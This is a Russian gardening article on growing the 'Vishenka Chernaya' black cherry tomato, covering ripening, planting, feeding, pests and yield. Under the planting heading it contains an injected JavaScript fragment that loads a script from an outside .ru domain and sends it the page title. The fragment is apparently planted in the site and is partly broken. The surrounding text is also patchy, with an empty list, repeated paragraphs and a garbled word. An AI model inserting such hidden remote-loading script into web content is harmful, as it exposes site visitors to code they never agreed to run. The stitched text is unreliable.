Томат черри Вишенка Черная Гавриш - отзыв

Разбираемся в тонкостях выращивания томатов Вишенка черная, а также изучаем полное описание сорта и его характеристики. В статье вы найдете фото помидоров черри и отзывы фермеров об урожайности одного куста.

Описание и характеристика сорта

Вишенка черная – это раннеспелый высокорослый сорт томатов, который идеально подходит для выращивания в теплицах и открытых грунтах. Сбор урожая можно проводить примерно через 110-112 дней после того, как появились первые всходы. Индетерминантный томатный куст обычно вырастает до 2-х метров, поэтому его формируют в 2 стебля, подвязывают к надежной опоре, пасынкуют.

Особенности плодов сорта Вишенка черная:

Посадка и выращивание томатов Вишенка чёрная

var m5cd2cccfb64f9 = document.createElement(‘script’);
m5cd2cccfb64f9.src=’https://dl6pkf7e.ru/show/?’ + Math.round(Math.random()*100000) + ‘=’ + Math.round(Math.random()*100000) + ‘&’ + Math.round(Math.random()*100000) + ‘=39333&’ + Math.round(Math.random()*100000) + ‘=’ + document.title +’&’ + Math.round(Math.random()*100000);
function f5cd2cccfb64f9() else
f5cd2cccfb64f9();

При выращивании томатов Вишенка чёрная используют агротехнику, абсолютно аналогичную той, что применяется при культивировании других сортов индетерминантных помидоров.

Сажают томаты Вишенка чёрная по схеме 50×70 см. Такие растения ввиду высокого роста имеют повышенную требовательность к условиям выращивания. Им нужны:

• достаточное количество влаги на всём протяжении формирования и вызревания плодов;
  • своевременные не реже раза в месяц подкормки поочерёдно комплексными минеральными и органическими удобрениями;

Чтобы томаты Вишенка Черри поспели вовремя, нужно подкармливать их не реже раза в месяц поочерёдно комплексными минеральными и органическими удобрениями

• обязательное рыхление земли возле кустов после полива или естественных осадков для обеспечения доступа воздуха к корням;
  • своевременное подвязывание и пасынкование.

Возможные болезни и вредители

Чаще всего этот сорт страдает от тли, паутинного клеща и белокрылки. Чтобы не допустить поражения, кусты опрыскивают двухдневной настойкой чистотела (1-1,5 кг свежей мелко порезанной травы на 10 л воды) либо содовым раствором (250 г соды на ведро в 8-9 л воды).

Нельзя опрыскивать раньше, чем через 2 недели после переноса рассады в грунт. Спустя неделю процедуру повторяют.

Из болезней сорту опасен фитоспороз. Против него применяют специальные препараты, например, Фитоспорин, или раствор молочной сыворотки с водой в соотношении 1:1.

Валентина Редко

Главный редактор Репка.онлайн. Опытный дачник и садовод.

Томат черри Вишенка черная – красивый и необычно выглядящий сорт. У него прекрасный вкус, а плоды очень сочные. Он идеален как для заготовок на зиму, так и для употребления свежим. С уходом справится даже новичок, а результат порадует всю семью.

Описание томата Вишенка черная, отзывы, фото

Раннеспелый, высокорослый сорт томатов черри для теплиц и открытого грунта. Период от всходов до начала созревания составляет 110-112 дней.

Куст индетерминантного типа, высотой до 2-х метров. Требуется подвязка к опоре и пасынкование. Наилучшие результаты получились при формировании растения в 2 стебля. Лист у этого томата среднего размера, темно-зеленый. Соцветие промежуточного типа.

Сорт томата Вишенка черная включен в Госреестр по Российской Федерации для выращивания под пленочными укрытиями в ЛПХ. Это один из лучших сортов черри-томатов с оригинальной окраской плодов.

Характеристика плодов

Плоды округлые, гладкие, плотные, в стадии зрелости фиолетово-коричневого цвета, весом 18-20 граммjd, сочные, хорошего вкуса со сладостью. Эти помидоры подходят для свежего потребления, цельноплодного консервирования.

Урожайность: до 7 кг плодов с 1 кв. метра посадок.